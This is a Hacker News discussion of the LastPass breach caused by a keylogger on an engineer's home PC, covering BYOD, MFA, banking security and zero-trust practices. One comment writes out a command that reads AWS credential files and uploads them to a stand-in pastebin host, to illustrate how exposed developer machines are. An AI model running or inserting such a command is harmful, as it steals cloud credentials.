LastPass says DevOps engineer’s hacked computer led to security breach in 2022 (9to5mac.com)
376 points by mikece on Feb 28, 2023 | 261 comments



I'm not sure the description is what actually happened. It doesn't have the ring of truth to it.

That said, LastPass is not deserving of any trust as a password product of any kind. That a password was captured by a keylogger on a DevOps engineer's home computer shows that they don't understand how to secure remote computers, the meaning of defense in depth, the importance of proper login authentication, or how to secure data at rest. Each of these points is close to the core of their business.

I don't wish them ill. I hope they recover from this, but they need to understand security to produce a security product.


> I hope they recover from this, but they need to understand security to produce a security product.

It's because the market doesn't actually pay for a secure product, but for the appearance of one.

The end user buying it cannot really discern whether the company's product is actually secure. There's no standard third-party auditing (by, say, a gov't organization).

Banks are run securely not because I personally audit them, but because the gov't mandates liability onto the banks for losses from their insecure systems. So the banks are secure because they stand to lose a lot. The same must be mandated for all companies imho, or insecure companies will continue to exist and thrive.


Eh banks run securely because it’s very difficult to steal money.

Hard currency theft requires a physical attack, and "digital currency" is essentially just a spreadsheet that requires a settlement mechanism, such as correspondent banking, to work.

Bank transfers are nothing more than messages going between different branches and banks; nothing is actually transferred other than orders.

The attack surface of modern banks, especially large ones, is actually ridiculously small, since you need to defraud or compromise not just a single bank but the entire system and all the other banks using it: once the offended bank notices an inconsistency, it can issue a notice to reverse the offending transactions.

Also, bank transfers are often liabilities between banks: when an account at First Capital transfers $1M to someone at First Direct, First Capital now owes First Direct $1M, which makes First Direct a creditor. That's why First Direct will likely quarantine the funds until the transaction is fully verified and settled, and even then there's likely to be a cooldown period to reduce the risk even further.

Most of the security within banks is designed to deal with internal threats, since the entire banking system is essentially based on mutual trust, which gives individuals, even fairly low-ranking branch employees, the ability to authorize fairly substantial transactions.


> Eh banks run securely because it’s very difficult to steal money.

I think you got the cause and effect backwards: banks are run securely because it's been made very difficult to steal money. And stolen money gets tracked (if you did steal a large amount) under anti-money-laundering laws, which makes it hard to spend.

Why is banks' attack surface small? Why are all these other "systems" in place to make stealing money difficult?

Why isn't the same happening with stolen credentials, or data?


It's telling that in the areas where banks don't bear responsibility (criminals breaking into individual accounts and draining them, for example) they are insecure: SMS 2FA, short PINs, etc.

https://www.bbc.com/news/business-64240140.amp

> He said Barclays told him it would do an internal fraud investigation which later resulted in Mr de Simone being held liable for all the losses.

> "They could not identify a point of compromise from the back end - to them it looked like the pin had been entered.

> "The only thing they could suggest was that someone knew the code therefore it's gross negligence on my part apparently.

In the olden days banks used to have decent security. Even once you gained access to the account, to pay a new payee you'd need your bank card and PIN to do the 2FA. Now it's all on the same phone.


The case isn't settled yet.

> After eight months of evidence gathering and dealing with the police, an investigator at the Financial Ombudsman Service (FOS) upheld Mr de Simone's complaint against Barclays which now, if it disagrees with this, has the opportunity to ask the ombudsman to examine the case.

They are just trying to wear him down.


I think you got them wrong.

Bank customer data breaches are not that rare.

Money in a bank is "secure" because transactions are cross-checked with counterparties. Banks' data leaks like everybody else's.


This. At the end of the day, if it is a significant transfer there are people in locked rooms that have to call each other and independently verify a transaction brokered by a third party. And if you don't pass a background check, and don't need to be there, you don't get in that room.


All this might be true in the US where realtime transfers don’t really exist.

But here in the UK, where we've had realtime, high-volume transfers for at least a decade, it's very possible to steal digital money and move it on before the bank notices.

Faster Payments in the UK are expected to be credited and spendable within 20 minutes; normally the money is spendable within milliseconds. The actual settlements happen every few hours, and all of it is pretty much automated. Additionally, because the money can be credited so fast, there is no recourse for a bank to recover a payment it has authorised; it has to settle it. Sending the transfer message is as good as sending the money: once it's sent, the bank has to pay, and if it refuses, the money is taken from its collateral at the payment network to pay the debt, and it's disconnected from the payment network.


I'm from the UK. That's for relatively small amounts, and it's insured; this is the cost of doing business, and there are still a lot of fraud checks, especially for new payees.

If your account all of a sudden has tens, let alone hundreds or thousands, of transfers coming in, it will be quarantined.

HSBC locked my account just last week over 7 or 8 transfers of circa £10 each, all made on the same day by colleagues from my work, since we'd bought a gift for someone who was leaving and were settling the payment.

Authorized push payment fraud still does happen but it’s fairly negligible in the big scheme of things.


> If your account all of a sudden has tens, let alone hundreds or thousands, of transfers coming in, it will be quarantined.

> HSBC locked my account just last week over 7 or 8 transfers of circa £10 each, all made on the same day by colleagues from my work, since we'd bought a gift for someone who was leaving and were settling the payment.

I would be careful assuming that HSBC is representative of how banks in the UK work. They're well known to be the most trigger-happy bank when it comes to account and transfer freezes. HSBC was probably the number one cause of complaints related to transfers while I was working in the fincrime team of a different bank.


> Eh banks run securely because it’s very difficult to steal money.

Banks run securely because they have serious and mandated change control processes, applied against a formal classification of the importance of systems.

Something you generally won't see outside the top 100 of non-bank companies.

This means their IT evolves glacially slow, but it does keep things stable.


Banks are a lot less secure than e.g. Google. And Google has fewer government mandates on them than banks do.

(I worked both in banks and at Google.)

However you are right that Google thinks they would lose a lot from being less secure.


Sometimes organizations that look less secure are actually more secure just because they degrade gracefully under attack and/or can more easily mitigate/revert the consequences of successful attacks.


Banks' true security is rooted in the real world.


Depends on what you are talking about.

Stealing cash from the vault: sure, that's 'real world' security.

Protecting their customers' data: nope, that's all digital.


Indeed, and they are happy to close branches left right and centre in the UK. My village just lost its last bank.


There's no such thing as a secure product, only secure enough. And LastPass, storing billions of passwords, is a very high-value target. They probably have hackers banging on their firewalls all day, every day.


Also for convenience over security. Like how Signal was the best secure option out there, but people went to Telegram instead because even if it was (slightly?) less secure, it's a lot more convenient.


Telegram isn't end-to-end encrypted by default.


Unfortunately losses from insecure banks are considerably easier to quantify than losses from insecure secrets storage.


While it's very civil of you to wish recovery upon LastPass, I don't really think the product is deserving of redemption. This is not the first major incident and it demonstrates little growth in relation to prior breaches. The world as a whole would probably be better off if LastPass were to breathe its last.


They need to sell it to someone else with a better track record.


I agree with the GP. Why would selling it solve the issues with the product?

How much of the product can be salvaged?

They have a well-known brandname, but it is arguably radioactive now.

The product as software can be rebranded, but why go through this effort if the underlying software has proven faulty so many times in the past?

A similar effort can be invested in making open-source password managers better, so there is a clear opportunity cost to salvaging LastPass.

Plus a sale would surely only directly benefit those most responsible for LastPass' issues. It would mean they are directly rewarded for their incompetent execution.


It seems like nothing is necessarily wrong with the software itself. It's the opsec surrounding the software. The most secure software in the world can be pwned if you can get access to the lead dev's system or the build system itself.


Yeah, because the description is inadequate. Is this BYOD? (… seems like not the employee's fault.) Did the employee use the same password on the work laptop and at home, and get credential stuffed, while LastPass isn't using MFA¹? (…seems like not the employee's fault.) Was there some jump from a compromised home laptop to a corp laptop? (The network is never to be trusted. …seems like not the employee's fault.)

The buck is supposed to stop at security, not at each employee's personal hygiene … if your game plan depends on the latter, it's game over.

There's more here than is being written, and I can only imagine because the truth probably stinks.

¹except TFA mentions MFA … but the mention of it doesn't really make sense.


> The buck is supposed to stop at security, not at each employee's personal hygiene … if your game plan depends on the latter, it's game over.

I have to take security trainings twice a year that literally talk about the buck stopping at my digital hygiene and I better not fuck it up for The Company.

Companies have to understand breaches will happen, but preparing employees on how to spot attacks or understand when they've been breached is a huge component of their ability to repel or minimize attacks.


Security is basically layering imperfect solutions on top of each other until the statistical probability of breaching ALL of them gets small enough to satisfy the requirements of the organization.
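
For illustration, with made-up numbers: if each of four independent layers stops 90% of attempts, only 0.1^4 = 0.01% of attempts get through all of them. The catch is that real layers are rarely independent.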

In the case of LastPass, they're holding data (which they shouldn't have been, to be fair) that's INCREDIBLY attractive to everyone from script kiddies to nation-state actors. When it comes to keeping out nation states, the threat model can get kind of wild and difficult to engineer for while building what's ultimately a consumer-facing product. However, in this particular case it's fairly obvious that bad IT policies led to an issue and LastPass got burned.

I would be more forgiving of LastPass, but letting employees do BYOD means you have to trust everyone that ever uses that computer, including spouses and children. It's just really dumb.


LastPass’ lackadaisical attitude internally for defense in depth is indeed embarrassing.


> I have to take security trainings twice a year that literally talk about the buck stopping at my digital hygiene and I better not fuck it up for The Company.

this is mostly so they can pin it on you when it inevitably happens (rather than the management)


Right, but that's for your average user. Suppose your machine is infected with a keylogger that results in a stolen password because of a vulnerability that wasn't identified and corrected in time.

That's not on you as an employee, that's on the security team for not implementing compensating controls/defence in depth.

Yes, you have a responsibility to detect phishing emails, not write down passwords, not insert random USB drives, etc. But if something happens to you completely behind the scenes during your normal business, it's not on the employee.


> Yes, you have a responsibility to [...] not write down passwords

Most places force you to rotate the password so I would not say it is a responsibility to not write it down.

I do it. It is like there is a fixed number of passwords per life you can remember or something.


Almost 20 years ago, I worked with this (not particularly competent) sysadmin. Policy said the root password had to be rotated once a month. So, in July 2003, they set the root password to blah0307 (where blah was some random word, which I forget now but knew at the time.) I wasn’t actually supposed to know the root password, but one of my colleagues let me in on the secret, including the repetitive pattern. I think the security auditor ticked the box “root password changed every 30 days”, but never asked what the password actually was.

I know some places have rules like “must have at least N characters different from previous passwords”. However, depending on the exact rule, people can come up with easy-to-remember workarounds: e.g. the “blah” bit is ”foo” in even months and “bar” in odd ones.


Even more so, I think writing down passwords on paper is actually pretty good security:

An attacker can only hack the paper with physical access to my office. But if they have that, they might as well install a physical keylogger.

You can also combine a written down fragment of the password with a remembered one.


> An attacker can only hack the paper with physical access to my office.

... and there are lots of unrelated people with physical access to your office. Cleaning staff, building maintenance, HVAC technicians, printer service staff... and all of these may not have the same level of background checks as your company has.

And even if you hire all of these yourself (which makes sense at a certain scale), that still doesn't protect you against marketing inviting a camera crew and walking around everywhere in one of these typical "life at the office" short films for LinkedIn. IT staff offices seem to be very popular for such films since they're usually the most personalized rooms, with lots of nerd stuff on the walls and desks.

Besides: swiping a photo of a post-it leaves no evidence, whereas installing a physical keylogger certainly does.


Nobody said the piece of paper has to be a post-it on your monitor. It could be in a folder in a locked cabinet.


Just write it in your class syllabus; no one will ever find it there.


Yes. What I had in mind when I wrote my comment, was to stick the piece of paper in your wallet. But your suggestion also works.


I'm sure they meant something analog like on a sticky note rather than in a password manager, where it should be stored.


My bank still won't let me paste a password, so at least that bank doesn't want me to use a password manager!


If you start dragging a password from 1Password, the window disappears and you can release your mouse over a field elsewhere, and it will get typed in there (instead of pasting). This may or may not work for your case.


You missed the point of what I said; I was just using examples of things that are the responsibility of the employee.


I agree with this assessment. I am also required to run security scanning software by corporate that inspects a lot of activity on my machine.


I expect the number of companies that would get fucking owned by someone simply managing to execute

cat ~/.aws/* | curl -s --data-binary @- https://some-pastebin.example/api

on a devops/senior dev machine is colossal. (The upload host is a stand-in for whatever pastebin the attacker fancies.)


What I want is a secure shell (somehow) where my env variables are encrypted and on access I get a prompt to either use a fingerprint reader or a password to unlock them for the process.

Anyone know of any such option? What I've come to use are separate env files that I source in various directories before running the commands that need credentials, or a tool that decrypts a file, loads it into a subprocess's env vars, and runs a program (something like mozilla/sops), but I still find that too cumbersome. I'd like it transparent and integrated with my shell.
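
For reference, a minimal sketch of that decrypt-then-exec pattern in Python. The file name, fixed salt, and KDF parameters are invented for illustration, and real tools (sops, aws-vault) do this far more robustly:

    # Sketch: prompt for a passphrase, decrypt an env file, and run a
    # child process with the secrets injected, so they never land in the
    # parent shell's environment. File name/salt/KDF are placeholders.
    import base64, getpass, os, subprocess, sys
    from cryptography.fernet import Fernet
    from cryptography.hazmat.primitives.kdf.scrypt import Scrypt

    def load_env(path, salt):
        pw = getpass.getpass("passphrase: ").encode()
        key = Scrypt(salt=salt, length=32, n=2**15, r=8, p=1).derive(pw)
        plain = Fernet(base64.urlsafe_b64encode(key)).decrypt(open(path, "rb").read())
        return dict(line.split("=", 1) for line in plain.decode().splitlines() if "=" in line)

    if __name__ == "__main__":
        # usage: python with-secrets.py aws s3 ls
        env = dict(os.environ, **load_env(".env.enc", salt=b"demo-salt-16byte"))
        sys.exit(subprocess.call(sys.argv[1:], env=env))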


aws-vault[0] does this, but only for aws creds

0 - https://github.com/99designs/aws-vault


Yeah this is a good tool, if annoying at times.

A better way would be to not allow user accounts to deploy anything in any sort of prod accounts, instead only allowing this to happen through CI.


Combining direnv with sops can be a partial solution here.


> ¹except TFA mentions MFA … but the mention of it doesn't really make sense.

I guess there was a loophole in their MFA integration. Maybe they accepted the same TOTP twice; in a multi-region setup I guess this might be a trade-off that somebody might risk. With a keylogger one can theoretically steal a TOTP anyway, or do other more sophisticated shenanigans.

> We enabled Microsoft’s conditional access PIN-matching multifactor authentication using an upgrade to the Microsoft Authenticator application which became generally available during the incident.

Maybe switching to push notifications with number matching is their mitigation for that (e.g. without affecting multi-region replication / performance).
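
Purely to illustrate the replay hypothesis above (nothing public confirms this is what happened): preventing reuse means remembering the last accepted time step per user, which is exactly the state that's awkward to share across regions. A sketch using the pyotp library:

    # Sketch: reject any TOTP code from a time step at or before the
    # last accepted one, so a keylogged code can't be replayed. The dict
    # is a stand-in for a shared store (the multi-region pain point).
    import time
    import pyotp

    last_step = {}  # user -> last accepted 30-second time step

    def verify_once(user, secret_b32, code):
        step = int(time.time()) // 30
        if step <= last_step.get(user, -1):
            return False  # a code from this window was already accepted
        if pyotp.TOTP(secret_b32).verify(code, valid_window=1):
            last_step[user] = step
            return True
        return False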


We are looking at a highly sensitive asset, though. A vault that is only used by four employees (per the original press release, not in the 9to5mac article) and contains keys for the production backups.

At this level of sensitivity you need to consider "should the employee's personal Plex server be able to connect to this," and the answer might be a no. At this point you should be issuing them a PAW (privileged access workstation) and a physical security key and auditing the shit out of it. It's not like LastPass can't afford it.


I understand what I'm asking for is "educated conjecture" more or less, but what would you surmise might be actual plausible situations rather than what LastPass is putting out as PR? Just asking as a layman who is curious with no skin in the game.


If you BYOD then do your work stuff on a VM. It’ll help with security and has the benefit that you can just delete the VM when you change jobs.


Are there any reliable ways to secure remote computers from keyloggers _and_ still provide an efficient software development environment for non-trivial projects?

All of the software engineers I have seen have a fairly unrestricted environment -- Linux machines, with sudo access, often with passwordless root access via the "docker" group, and with a non-intrusive "endpoint protection" system. It would be normal for someone to run "npm install" on their machine, or check out a random GitHub repo they read about and run code from it.

Such a machine would be a prime target for malware. And the endpoint protection I have seen seems to be really stupid -- basically hooking "exec" calls and checking for an exact hash match (!). Any serious malware should be able to bypass it without much effort, and if it only stays on a single computer, the detection chance is pretty low.

(I have also seen some poor souls who were stuck on locked-down Windows machines... but they usually ended up using their machines as remote terminals, doing most of their actual work on some remote server. And that server is sudo-capable Linux with light/no protection; see the previous paragraph. I suppose if _that_ is infected, at least LastPass might not be stolen... unless people start a browser on the server and log into LastPass there; I've seen this happen.)


Personally, I'm not a fan of the answers that amount to a cloud-hosted thin client. I use these at work, they're absolute technological marvels, but they suck.

The real answer is a zero trust network that implements:

- multi factor auth

- deployment approval gates

- end to end service encryption

- ALE for secrets and keys

- password managers

- WireGuard tunneling or equivalent

- read only production environments by default; major levers to pull in order to write

- fully partitioned environments, all of which are partitioned away from the corporate network of laptops, printers, and security cameras


> - read only production environments by default; major levers to pull in order to write

Yes. In general, it's a good idea to split state management from business logic.

In the simplest case, that means e.g. having a database that's separate from the rest of your site. But the principle applies more generally.

Useful for keeping things simple.

To go further: if you want to log something, you send it to a log server that is super simple and can only write to one location. So if someone takes over your business logic service, they can't write arbitrarily.
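
A sketch of how dumb such a sink can be (port and path invented for illustration):

    # Sketch: a deliberately simple log sink; it can only append to one
    # file, so a compromised business-logic service that reaches it
    # can't write anywhere else.
    import socketserver

    class LogSink(socketserver.StreamRequestHandler):
        def handle(self):
            with open("/var/log/app/append.log", "ab") as f:
                for line in self.rfile:
                    f.write(line)  # append only; no other capability

    if __name__ == "__main__":
        socketserver.TCPServer(("0.0.0.0", 9514), LogSink).serve_forever()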


You've already included the answer - "using their machines as remote terminals, doing most their actual work on some remote server".

The developer uses MFA (TOTP, Push Notification, Yubikey etc) into a virtual desktop inside the organisation (Citrix, VMWare Horizon, etc).

From there, the developer can SSH / whatever into their development environment - which is hosted "inside" the corporate network, or their cloud provider, via internal links.

All code, and dev boxes live "inside" the corporate network, and only keypresses, mouse movement, and screen diffs are sent back and forth.

Most remote access packages can prevent clipboard, USB device, file transfer etc.

If you need a password manager for work purposes, then it lives on the corporate managed network - not your remote laptop/desktop - and to be really paranoid - you only ever "copy/paste" those passwords - you don't type them in.

If you really want to lock it down further, give the remote workers dedicated corporate equipment that they only use to access the remote desktops, so you can prevent some things like screen capturing, and really lock down the software to prevent things like keylogging software/malware.

You also should have the entire development environment segregated from the "business" corporate network as well.

It's only really an issue if you want to have offline developers, in which case I don't have any thoughts ready to hand (but I would expect it to be a very locked-down machine, possibly with an even more locked-down VM inside it).

As someone who regularly uses multiple layers of Virtual Desktop -> Virtual Desktop -> Remote Desktop, provided the network can handle it (on both your local network, and the corporate network), it works surprisingly well.


This is both a misunderstanding of the problem and an attempt to solve an administrative problem using technology... which cannot really solve it.

Developers have nothing to do with this. It's common practice in companies that have an "expensive" production environment (e.g. VMs rented from AWS) that developers never get any kind of access to the production environment. Ever. At all. No need to tie developers' hands by putting them behind a ton of unnecessary firewalls. They have no need for the sensitive information and shouldn't be burdened by protecting it.

The people who do have access to the company's "expensive" production environment are, or should be, very few, most likely in the infra / DevOps department. These people do need to follow a special protocol for communicating with the "expensive" environment, which likely doesn't happen all that often. It depends on the product, of course, but it's unlikely to be more than once a day, or even once a week.

----

PS. In many, many years of being in infra / systems / automation I have never typed any passwords for any important services I had to use. They are usually difficult to type due to having all kinds of Unicode characters I wouldn't know how to reproduce w/o a little research. It's also very rare that they end up in the system clipboard, since I usually end up using something like vi+tmux over SSH in Emacs' ansi-term to copy the password from somewhere and paste it somewhere else. So, stuff like AWS keys would have to be stolen by taking screenshots of my screen or something like that...

I mean, why on Earth would anyone deploy to a production environment from their personal laptop? Normally, deployment is made from some sort of testing / staging environment where the system was being tested / archived before shipping it to the next stop... It sounds like some kind of emergency / unplanned situation where a DevOps engineer had to log into the remote system from their laptop.


Are you misunderstanding the term "DevOps"? You build it, you run it. If a DevOps team only runs things other developers have built, it is not a DevOps team.


In this case, DevOps shouldn't be rearchitecting, developing, or changing a password management solution's crypto, architecture, or design in any way. Not in the slightest.


No. I'm not.


There seem to be two competing definitions


I'm all in for VM-based privilege separation, but that won't protect you from an infected endpoint. Assuming this was a targeted attack, the folks who achieved RCE on the DevOps engineer's machine could have waited for her to authenticate and then injected keystrokes into the VM, SSH, VNC, Remote Desktop, Citrix, or whatever remote management system they're using.

Honestly, this HN thread is full of bad advice and factually incorrect patronizing. An Okta-style system asking you to accept every single permission would not have protected against this attack, because Okta caches and reuses authentication tokens. Clipboard snooping / keylogger detection wouldn't have worked because none of these solutions are robust against targeted attacks.

The only thing I can think of which would have (and should have) helped is an alert SOC / incident response team. Good luck finding one though.


Glad to see someone else with the same reaction, because a lot of this advice is... interesting, like people who are worried about keyloggers but think the clipboard is safe.


In my experience, working with Virtual Desktops is about the most frustrating user experience a developer could have. I prefer working in containerized environments, which are more efficient and don't require the same amount of configuration as a Virtual Desktop.

You should check some solutions out.


> You also should have the entire development environment segregated from the "business" corporate network as well.

This is the key point, otherwise you'll also just get a Linux machine with developer root access, but EVEN CLOSER to the corporate network.


For most development work, this would probably cause a serious productivity drop, but it definitely makes sense for the portion of the work that involves accessing critical production resources. For DevOps roles, that could well be the majority.


My company operates in a Windows centric industry and our software team uses it as well.

It turns out you don't need administrative privileges for a lot of dev work (installing and running VS Code, Python, Node, many databases, etc...).

My experience is that sudo apt-get install is a Linux distro thing; most programs don't need special permissions as long as they are installed in user scope.

So, answering your question, our devs are like regular users: when they need to install something that needs privileges they call IT. Surprisingly, that rarely happens.


Privilege escalation on Windows is super easy though, every red teamer I know has a bunch of ready to use exploits (most of them public) up their sleeve. And it is virtually impossible to get a good baseline of a developer's machine, so I'm pretty sure every SOC out there is simply allowlisting huge swaths of your software.

You can sorta kinda harden these systems, but that would only work against common malware. And you generally can't isolate senior engineers in their own little DMZ, so any RAT on their machines usually leads to catastrophic consequences.


Privilege escalation is a red herring. Everything you need to compromise production from a developer PC is either available for a regular user or not available at all.


Anyone with this level of access should know not to run random GitHub projects or npm install in the most sensitive context. The choice is between easy and secure. You can't have both, and that's a reality one has to accept. It's not that difficult to spin up a VM when you want to fuck around and isolate it from sensitive data.

Especially as a "DevOps engineer", gatekeeping and providing least-privilege access is in the job description. I understand getting lazy and relaxing the rules in some contexts, but not when running a password manager at this scale; unacceptable.


Don't do development on any system that has access to production. Develop on dev lane resources.

Production access should only be allowed from a locked down system with no open ports and a very small whitelist set of software. Operations for said system should be simple. Deploy version x with necessary provisioning. Backup system. Restore system. View monitoring and logs.

You must minimize the surface area connected to production.

On the network side the system with the keys for production is also firewalled off from general Internet access. So potential malware can't phone home.


Give you a MacBook and a cloud Linux dev machine (or as many as you want).

Secure access to dev environment with multiple easy factors - MBP biometrics, yubikey, etc

Enforce a strong password and FDE on the laptop.

Obviously doesn’t need to be a MacBook, but you stated an aversion to overly locked down windows laptops.

In general, just enforce strong multifactor creds when accessing internal resources.

You can also enforce device verification requirements, so a stolen device or YubiKey can't be used either.

Then do what you want on your Linux instances in the cloud. They’re protected with their own controls.


> That a password was captured by a keylogger on a DevOps engineer's home computer shows that they don't understand how to secure remote computers

I tend to disagree. The potential for any single employee to do substantial harm to any business is incredible and designing a system to make that not possible is nigh impossible.

It's neither the humans' nor the institution's fault. It's just that systems involving humans are incredibly hard stuff. You are constantly weighing the rigidity of the system against the potential to do harm within the system. How much leeway can it give to make it possible for humans to do their job in a complicated world?

If you go down the path of "we need a process for everything" you are going to end up with a lot of processes. The inherent problem with that approach is that (for most businesses that are not exactly Amazon) a lot of processes cannot feasibly be systematically enforced and rely on being honoured by humans at juncture points, to an extent that makes you very uncomfortable when you consider what mechanisms your system has for when they just don't.

As of now, most systems simply rely on humans to do the right thing at the right time, for no other reason than it being the right thing and them knowing that, for the whole world to not go up in flames.


If a password was captured by a key logger, rather than a session token being stolen, they didn't implement 2FA for this login.

They are also talking about a home computer. In my company, VPN access is limited to trusted devices; therefore, sensitive systems can only be accessed from a corporate machine.

Security at LastPass seems substandard for a company storing security credentials. Unfortunately, from my experience, this is relatively common, and regulators need to start issuing significant fines or prison sentences for this to improve. Unfortunately, it is too easy for CTO/CISO to find a scapegoat and avoid scrutiny.


There isn't enough information to tell. With a keylogger you can steal the password every time it's used; MFA will just prevent / limit its use. So it doesn't tell us anything about their MFA implementation, or whether attackers reused a session or did some other trick (e.g. time-based tokens can by design be used multiple times within the given time period, or you could hijack the first MFA token while it's being sent to the server and present an error; now you can use this token yourself while the user successfully logs in with the second token).

Once you get the password vault, it's very likely that you also get the creds necessary to set up the VPN. Besides, there are ways to bypass (poorly implemented) VPNs, and relying on VPNs isn't even best practice nowadays.

I agree with you that a few CISOs getting sentences would be the fastest way to raise the bar across the tech sector, but that's never going to happen.


A secure MFA implementation requires a second device to authorise the login. As you correctly point out, generating a code and then entering it on a compromised machine is SFA, as it treats the token as a second password. If MFA is implemented correctly, the only attack vector should be the session token.


LastPass has a different threat model than most companies. They should hold themselves to a higher standard than everyone else. An employee's private PC should not have access to production data. They should use a VPN and multi-factor auth, and everyone in the company should be trained.


Restricting access to corporate environments to trusted machines is trivial using any form of MDM. No one should be working from their personal machines. That's gross negligence.


> Restricting access to corporate environments to trusted machines is trivial using any form of MDM.

Until somebody pulls out their personal cell phone, and takes a photo of a screen containing highly confidential data, to then send it to someone else, because, dang it, they had to get something done NOW and it seemed very convenient.


No security measure is 100% effective nor 100% moron proof, but in many companies that would be a fireable offense, which gets you pretty far.


Some consumer electronics companies have security guards enforcing that no cellphone gets on premises. If you want security you can get security, but is the price worth paying? It all depends on the cost of a breach. Given that LastPass still has customers, maybe they estimated their costs just right ;) That cannot be said of some certificate authorities.


Even if they got pwned and the hackers got full system access like this, the screw-up is still definitely in the implementation, right?

Isn't this like basic stuff where you would use encryption that only the end-user can bypass?


To me it says their security is not up to par, and that employees were allowed to take secrets home. Which is fine to a point, but it has to be a company-managed, remote-wipeable, and locked-down system if it's people who hold the literal keys to the secure castle.

Same with the Canadian ban on TikTok: why are they even allowed to have phones they can install any software on?

BYOD and personalization is fine to a point, but only if you don't have high level access.


Am I right in assuming that in this case the engineer was using his home PC to work?

This isn't unheard of in the industry: engineers using BYOD devices or similar to work from home. But for a company with a risk profile as high as LastPass's, this seems _incredibly dumb_.

You would assume anyone with the keys to the kingdom was working on a company provided device, or any device that fits a compliance framework based on their own risk needs (which should be massive!).

E.g., endpoint management, AV/detection, FIDO2 with Yubikeys to access AWS as an admin and otherwise. Just a few off the top of my head.


My company isn't nearly as high-profile or security-focused, and we're not allowed to use our own computers for any work-related purposes; our work laptops run threat detection software, and we have a whitelist of software we're allowed to install.

I'm surprised that LastPass's policies aren't at least that strict.

My company has what I think is a big hole in this policy in that we're allowed to use our own phone for email, a few corporate apps (like Jira) and our corporate password manager (not LastPass), but IT doesn't do any management of phones (other than being able to wipe them remotely if you're connected to the company email server). I suspect that the company doesn't want to spend the money on giving everyone a managed phone.


As much as LastPass seems to be trying to pin this on a single engineer, and not a broad vuln, the fact that they have such lax policies around access management, especially for a password management system, tells me all I need to know to never use them again.

Waiting for the rebrand and the incoming lawsuits.


Yep. The symptom being that a problem of this scale can be caused by a single engineer, which points to the root cause being deeper and potentially systemic.

The question for future trust is: what's been / being done to prevent the same thing from happening again due to another single engineer?


Preventing this thing from happening costs a lot of $$$, so pretty much everyone just "accepts the risk", seeing that the probability of something like this happening to your company (during your tenure) is still super low. All the companies I know with a somewhat robust security posture have had a string of incidents in the past; that seems to be the only thing that can motivate putting $ into security.


It's not really very expensive to issue employees a laptop (which costs a percent or two of an engineer's annual salary) and tell them "All work must be done on the work laptop, no personal files/software allowed on the work laptop". For a little more money, they can add active management of the work devices, but just keeping work and personal device use separate would have prevented this.


No, there's no way to install a keylogger on a company device?!


There is, but in this case it was the employee's personal software that allowed the back door. It's ludicrous that LastPass allowed employees to put sensitive data (i.e. their password manager) on personal computers with, apparently, no restrictions on what software they run.

Closing the barn door doesn't guarantee that the horses can't escape, but when you don't even have a barn door, it's hard to blame the stable boy when the horses get out.


They answer that question directly here

https://support.lastpass.com/help/what-have-we-done-to-ensur...

TL;DR: not much


Yeah, this is the equivalent of blaming an intern for nuking the prod database. Maybe they were careless, or maybe that shouldn't be possible to begin with.


If your company uses something like Duo, they can still enforce some security posture on mobile devices, like preventing rooted/jailbroken devices or requiring a minimum iOS/Android version.

It's also possible that the stuff mobile devices can access is walled off from the internal network with a DMZ or firewall.


The company I work for has a setup for a separate work profile on my phone, which I understand to have separation enforced at the OS level. The work profile has a separate set of apps installed, limited to ones the company sanctions, and even for stuff like web browsing, none of the state is shared if the same browser is installed in my default profile. From talking to coworkers with iPhones, though, this doesn't seem to be an option for them (not sure if iOS supports it and my company just hasn't set it up, or if this sort of thing isn't supported on iOS at all). This seems like a much better solution than giving people two separate phones or forcing people to hand over control of their devices to their employers, but I guess not enough companies want this for it to have become the norm.


How exactly can your IT department whitelist all software on your device? Are you using any build tools that install third-party dependencies, or any development tools that do the same? Is your shell locked down so you can't run commands as a superuser?

I assume your IT just has a whitelist for some stuff, but I can't imagine actually being a developer without superuser privileges. Unless you're doing some sort of very controlled software development.


My company fixed that by only allowing SSO login on company devices. Everything else is SSO. Systems that weren’t SSO-enabled were replaced.


> You would assume anyone with the keys to the kingdom was working on a company provided device, or any device that fits a compliance framework based on their own risk needs (which should be massive!).

You mean one of those company devices that is so locked down that they are close to impossible to work on?

Like if you need to install a new (part of) a toolchain, you need to go through IT which takes between 3 weeks and 6 months?

But your deadline is next week and your manager doesn't care about your IT "excuse", so just use notepad and CLI (or your own PC where you can do in 1 day what would otherwise take you months).

Those devices... yeah...


As someone who works in gaming FQA with crazy locked down machines - we get software installed if necessary. Don't paint everyone with that brush.

We also have two PCs per desk (plus consoles) so that our clients' software isn't exposed.

I don't get how a company like LastPass didn't have basic security like this when an FQA shop full of people semi-literate in IT security has such a system set up.


You are making things up. Such a company probably exists somewhere, but I have yet to hear someone tell me a big-name tech company is doing this.


I could see this kind of sophisticated attack easily working on some random company with fairly lax BYOD policies. That would make sense; it was a rather sophisticated attack by the standards of your typical medium-sized company. But if your entire company and organization is built around keeping things secure, THIS is what brought you down? This isn't getting owned by some unforeseen 0day; it's just sloppy opsec.


I don't think he was necessarily working on his PC. He probably just had a LastPass account shared between work and his PC.


As a devops engineer, a shared account mixing private and business? That would be a security breach if you ask me.


I'm betting work gives him a free family subscription; ideally you'd have them as separate accounts. Not sure how the local vault works under the hood in that situation.


That’s absolutely no better.


This is completely unheard of for any company with any level of security. I’ve worked for 60 person startups that wouldn’t allow this.


I completely agree. It's not so hard to do MFA all the way down, either.


So, with most password managers, when you authenticate on a new device, you are prompted for MFA.

The user had a keylogger installed on their machine, so the attacker could collect the master password, but how did they log in to the vault on a new machine without MFA?

Did they get the MFA seed and login on a different machine, and nobody received a "You're using LastPass on a new machine, if this wasn't you..." message?

Did they exfil all that data to the compromised machine first, then out?

Unless I'm missing something, this doesn't seem right.


They had code execution on the person's computer, and the encrypted vault is downloaded and stored/cached on the computer: you only need the master password at that point to decrypt it. Or you can read the decrypted version out of the process (e.g. your web browser's memory).

The 2FA part in password managers (at least in the major players currently) is to get a copy of the encrypted vault from the server. The user did that part, and the encrypted vault was now easily accessible locally.
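
For the curious, the design being described looks roughly like this. A generic sketch: the blob layout and KDF parameters are invented and are not LastPass's actual scheme:

    # Generic vault sketch: the server's MFA gates *downloading* the
    # blob; once a copy is cached locally, the master password alone
    # decrypts it. Layout (salt | nonce | ciphertext) is a placeholder.
    import hashlib, json
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def open_vault(blob, master_password):
        salt, nonce, ct = blob[:16], blob[16:28], blob[28:]
        key = hashlib.pbkdf2_hmac("sha256", master_password.encode(), salt, 600_000)
        return json.loads(AESGCM(key).decrypt(nonce, ct, None))

    # With a keylogged master password and the cached file, an attacker
    # needs nothing else:
    #   secrets = open_vault(open("vault.bin", "rb").read(), "k3ylogged")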


Seems like a broken 2FA implementation.


2FA can't protect you from malware on your machine.


